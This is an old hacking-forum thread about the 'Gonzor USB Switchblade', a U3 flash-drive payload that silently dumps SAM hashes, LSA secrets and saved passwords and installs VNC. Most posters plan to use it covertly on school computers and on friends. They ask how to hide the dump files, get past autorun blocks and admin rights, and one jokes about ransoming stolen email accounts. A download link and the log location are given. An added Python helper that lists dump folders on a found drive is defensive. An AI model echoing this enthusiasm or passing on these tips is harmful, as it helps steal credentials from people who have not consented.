
U3 Usb Drives


ghost's Avatar
0 0

Ok well im back :D i did a service to the community and i got off for good behavior. I survived. And im trying to live up to everyone's expectations of coming back with something huge. Well yeh ive got one. Physical intrusion is often overlooked by hackers. It is more dangerous than u all believe. Gonzor, a friend of mine, has been working on a project called "gonzor usb switchblade". Basically upon inserting the usb it dumps all sorts of personal data. Here is what the most basic and public version dumps:

* Dump System Info
* Dump Network Services
* Dump Port Scan
* Dump Product Keys
* Dump SAM
* Dump Wifi Hex
* Dump Network Passwords
* Dump Cache
* Dump Messenger Passwords
* Dump Firefox Passwords
* Dump IE Passwords
* Dump Mail Passwords
* Dump LSA secrets
* Dump Updates-List
* Dump URL History
* Dump External IP
* Install VNC
* Install HakSaw

All of this is done silently and in a matter of 45 seconds. All it takes is for me to plug the usb device in and sit there; nothing has to be clicked. That's his exploit; it's a combination of hacksaw and millions of other apps. I am making a video for the community on how to secure against this. Peace


ghost's Avatar
0 0

"Physical intrusion is often overlooked by hackers. It is more dangerous than u all believe."

I totally agree with you SANTA. I think that Physical intrusion can be the easiest and some ways the hardest way to intrude into a network.

I think you are doing a service to the community. But, anyway, please create a version with the "install hacksaw" removed, for stealth reasons.


ghost's Avatar
0 0

yeh easy to do, just go back to version 1.1. those new ones are only in number 2. but im glad someone can level with me


ghost's Avatar
0 0

Can you post a link?

I tried the link in your profile, but it didn't work. Oh and about Bravenet's forums, they are subject to HTML and I think Javascript injections. (So someone could theoretically inject annoying audio clips, or worse)


ghost's Avatar
0 0

sweet! I hate U3, it autoinstalls, and I was just thinking "someone oughta write a U3-like rootkit." It shouldnt be that hard even for a novice programmer because U3 distributes an sdk. Yeah, SANTA, where can we get this? This looks like an awesome project… I've been getting tons of portable apps to try to get some passes to my school's network (we actually have a competent admin :( ) and this looks perfect. Way better than having the teach looking over my shoulder and screaming ommfg wdf r u doingQ?

If you need any testers, pm me, I have time (and an old box in my room) to kill :D


ghost's Avatar
0 0

lol im making a video on it as we speak.


ghost's Avatar
0 0

Awesome to see you back SANTA… also this U3 project… i've a coupla drives and a whole school that i see once a day.(only for a block then its back to another school) and i think this is something fun we could play with ^_-


ghost's Avatar
0 0

i agree with that. the video is up, its pretty crappy. I will make a better one but this is just to demonstrate the power and let some of you get out there and use it.


ghost's Avatar
0 0

aight where is said video? i'd like to see it.. but dunno where to look =\


ghost's Avatar
0 0

aight ^_- done :P


Ayr4's Avatar
Member
0 0

Sweat! Does this work on every computer? Or just some?:ninja:


spyware's Avatar
Banned
0 0

And you didn't post a public link because…?

Anyway, how did you do it? You got the source of every program in your list and recoded so the process is fully automated? Can I see the vid? (I am not posting my e-mail here, PM or something).

When you release it will it be open-source or "just" the exe? Anyways, welcome back I guess.


ghost's Avatar
0 0

Does this work if u insert it and hold down shift to disable autorun? Cus i'd like to give it to someone but some of my "friends" are rather cautious, though I doubt none even know how to do that. Also, does it save the stuff as hidden files? Because if he saw "password info" create itself while the stick is in the comp, he'd probably get suspicious and smash the thing…

:p and where's this video? I checked out ur site but you havent posted it there… I'd also like whatever stable version you have, too, as school's back in :p

BTW… nice name for it! and good luck with future versions.

Welcome back


ghost's Avatar
0 0

ok basically. yes its open source so you can view the source if you dont trust santa clauss. no shift key wont stop it. muhahaha lol thanks for the compliment on the name. but you should really compliment gonzor. the video will be on hbh soon. its huge though so im thinking of just making another one tonight of just me installing it and using it. but no need for an installation guide for you guys basically cause its piss easy.


ghost's Avatar
0 0

im downloading the vid now :D if it does what you say it does then i bow down to your skills at programming as it sounds fucking awesome!!!!

it will go on my security pendrive :P

i havnt downloaded the vid yet so i might be asking a stupid question but does it somehow alert you to when its done like make a beep or a little popup saying its done or something

[edit] i cant hear your voice over the sound of the music because this laptop has crap speakers, do you have a version with the music not as loud? [/edit]


ghost's Avatar
0 0

Where to download the program, Santa?


ghost's Avatar
0 0

for everybody out there this is NOT new!

this has been discussed in depth see hak5.org

if you care to look at the forums there is a LOT of information on this. http://forums.hak5.org/index.php?PHPSESSID=rfnnc18kqhcmrgul0ll3u7ugr4&board=20.0

also I am NanoyMaster and I am using this account as my other is borked.

I happen to have a U3 sandisk and neither system_meltdown or cheese hesitated when they (yes they) put it in their computers. I guess they didn't know about the tech. luckily for them I have the switchblade turned off.

I recommend it for anyone as it is only £15 for a 2 gig one w00t http://www.lowpricememory.co.uk/flash.html

enjoy


ghost's Avatar
0 0

SO… um, SANTA, you gonna give us a dl link to it or what? I'd REALLY REALLY REALLY like to get some stuff off the school comps :p

also, does it work with vista? I would think so, since it's basically xp with too much eye candy and less functionality :\

but idk what M$ changed with this OS, except that they use it at school now and it sucks

and, again, sweet stuffs!

ah, SANTA, you use objectdock. kewl, me too lol… l was just wondering… kind of random, how do you change your system's icons (like for folders, etc) just for your user without manually editing registry? I can do it for a single one but idk how to do them all…


ghost's Avatar
0 0

oh, and here's the url to the site switchblade's posted on, in case anyone was wondering. It's the first result on Google for "gonzor switchblade"

http://www.users.on.net/~simmo_89/switchblade/download.html

OK, and this has to be U3? I guess I'll install U3 on one of my old flash drives I dont use much anymore, just as a switchblade drive I guess, since I am NOT going to reinstall U3 on my main drive. I use portable apps, waaaay better than u3.

Not finished yet, will update on progress.

Ach, it has to be a "u3 smart drive"

My main one is u3 but this one is not… is there a way you can manually set u3 to be inactive until you manually activate it? It is soooo annoying, i would classify it with windows preload bugware.

nvm, sorry, stupid moment… autorun rofl, how could I forget?

w00t! it works, sweet!

oh, SANTA?

This writes nothing to the host computer's HD if the install options are unchecked, right?


bl4ckc4t's Avatar
Banned
0 0

um.. last I heard, the switchblade writes hidden files to the host computer. the antidote is on the hak5 website.

-Bl4ckC4t


ghost's Avatar
0 0

k ill check that out, cuz my dad gets very paranoid when he finds odd stuff… even tho he knows about 2% of what goes on in the comp :p

and, your sig… who is ImperfectTruth? and is he dead… about the only way to rm-rf / a person, right…? Forgive my blissful ignorance, respects to IP


ghost's Avatar
0 0

First of all, how do I retrieve the files? And secondly, I ran it on my main system (stupid me :() and i want to antidote it.


ghost's Avatar
0 0

google "switchblade payload antidote", the first thing, if I remember correctly, is the anti. Once you remove the drive, though, you're ok. Antivir won't detect anything left there.

As to how to find the files, they will be in [flash partition drive letter]:\System\Logs\COMPUTERNAME\

I don't yet know how to get the SAMs and all that… maybe santa will tell us

[edit] I just ran the SB a second time, this time it dumped everything (first time log was only 4kb long, this time 120!). Only useful stuff I got was my yahoo email account info. It wouldn't dump the sam, though I'm an admin on a win XP system (xp pro 2002/ 2005 media center edition). Maybe its MCE because it is not regular xp? I've got XP dual-booting on the crappy old serverlicious box in my room, maybe I'll try this on it…

Anyway, this thing's marvelous, but I don't really have any need for it. School comps are never admin, we got a good IT guy, and so it won't work there… or will it? I'll try in engineering tomorrow, we have a network of laptops in there. Anyway, this thing rocks. Good work SANTA, gonzor, and everyone else who worked on this. The thing owns.

ok, post is long enough.

[/edit]
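
Added example, not part of the thread or of the switchblade project: a triage helper for someone examining a found or confiscated drive, listing which computers have dump folders under the `System\Logs\COMPUTERNAME\` layout quoted in the post above. The host names, file names and sizes in the sample tree are constructed.

```python
from pathlib import Path
import tempfile

def _child_dir(parent, name):
    """Find a sub-directory by name, ignoring case (FAT volumes are
    case-insensitive, the examiner's mount may not be)."""
    if parent.is_dir():
        for child in parent.iterdir():
            if child.is_dir() and child.name.lower() == name.lower():
                return child
    return None

def find_dump_folders(drive_root):
    """Return {computer_name: (file_count, total_bytes)} for each host
    folder under <drive_root>/System/Logs/."""
    logs = Path(drive_root)
    for part in ("System", "Logs"):
        logs = _child_dir(logs, part)
        if logs is None:
            return {}          # layout not present on this volume
    hosts = {}
    for host_dir in logs.iterdir():
        if host_dir.is_dir():
            files = [p for p in host_dir.rglob("*") if p.is_file()]
            hosts[host_dir.name] = (len(files),
                                    sum(p.stat().st_size for p in files))
    return hosts

def build_sample_drive(base):
    """Constructed tree standing in for a mounted flash partition."""
    sample = {  # constructed host names, file names and sizes
        "SYSTEM/Logs/LAB-PC-01/dump.log": 4096,
        "SYSTEM/Logs/FRONTDESK/dump.log": 100,
        "SYSTEM/Logs/FRONTDESK/extra/more.log": 200,
        "Documents/notes.txt": 10,   # unrelated file, must be ignored
    }
    for rel, size in sample.items():
        path = Path(base) / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(b"x" * size)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_drive(tmp)
        for host, (count, size) in sorted(find_dump_folders(tmp).items()):
            print(f"{host}: {count} file(s), {size} bytes")
```

Each host name returned identifies a machine whose stored passwords should be treated as exposed and rotated.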


ghost's Avatar
0 0

Do you need Admin to get it to run?


ghost's Avatar
0 0

I think you need admin for a lot of the items it requests, or u just wont get them, but I don't think you need admin to actually execute the thing itself. It'll probably get you a few things, like tcp/ip and such, but not SAMs or anything like that. I'm going to try @ school tomorrow 'n see if I can get email passes. We use SquirrelMail, mebbe I can steal some accounts and ransom them :p


ghost's Avatar
0 0

lol last i heard it didnt write anything as long as you dont tell it to install anything on the computer. so if install vnc and hacksaw are off. then no trace :D Yes this is not new at all. switchblades have been around for ages. but all the others are nothing like gonzors the link is on the video. and i will be removing the music soon enough because yeh i cant hear me either :P yay community points for it :D btw just add me on msn for any questions or pm me lil_bro_92@hotmail.com be watching the site because v3.0 introduces the vnc fix and a few more features :D


ghost's Avatar
0 0

oh and thor i have the admin problem being sorted out as we speak. im not the greatest of hackers but i know lots of people and an iranian friend of mine whipped up a program in delphi that removes the xp admin password for you without needing to know the old one. well yes wen incorporated with switchblade… bingo lol i got a 8 megabyte log file off my skool because network dump was on :D and yes my admin are smart… but im smarter :D


ghost's Avatar
0 0

I just need a way to run the stuff as admin, or not require admin. If I remove admin pass then the IT department gets suspicious… unless I do it on a neighbor's comp :p

but then everyone in the school knows I'm the computer guy. Need something fixed, call me. Blame someone for something, it's me. haha.

So if in some future version you can dump all this stuff without an admin account it would be awesome, cuz i dont wana get suspended lol. Never even had a detention for anything!

I get so sick and tired of the blocks at school… it's not like I'm a hacker or anything, is it? ;)

Basically, what I'm getting at, I think a good goal for version 3 at least should be running, obtaining the info without an admin account, and not modifying (including removing passes, etc) stuff from the host. Literally plug 'n play. I've never heard of anything that totally bypasses admin restrictions without modifying admin account though…

Oh, and random question to anyone? Is it possible to view windows registry on an HD? I have no idea where it's stored… it'd just be a cool thing to know.


ghost's Avatar
0 0

BTW this is all gonzors. Not mine. I have not contributed code. Except like one idea tops. Just wanted to show you guys this. As it's the beginning of a saga on physical intrusion im making for HBH.


ghost's Avatar
0 0

Soz for double post dunno how it happened


ghost's Avatar
0 0

the sb won't run on Vista @ school, that's where I'm posting from now. Student accounts are not admin, and it blocks unregistered security certificate software from running without admin pass. damn… maybe it'll run on the few xp's left. I'm gonna go try to convince the admin to move back to xp though :p because VISTA FREAKIN SUCKS! It hogs up 600m of my 1gb ram here, just SITTING STILL! Oh, well, still got my good 'ol portable apps so I don't have to use stupid ms office 07…

ciao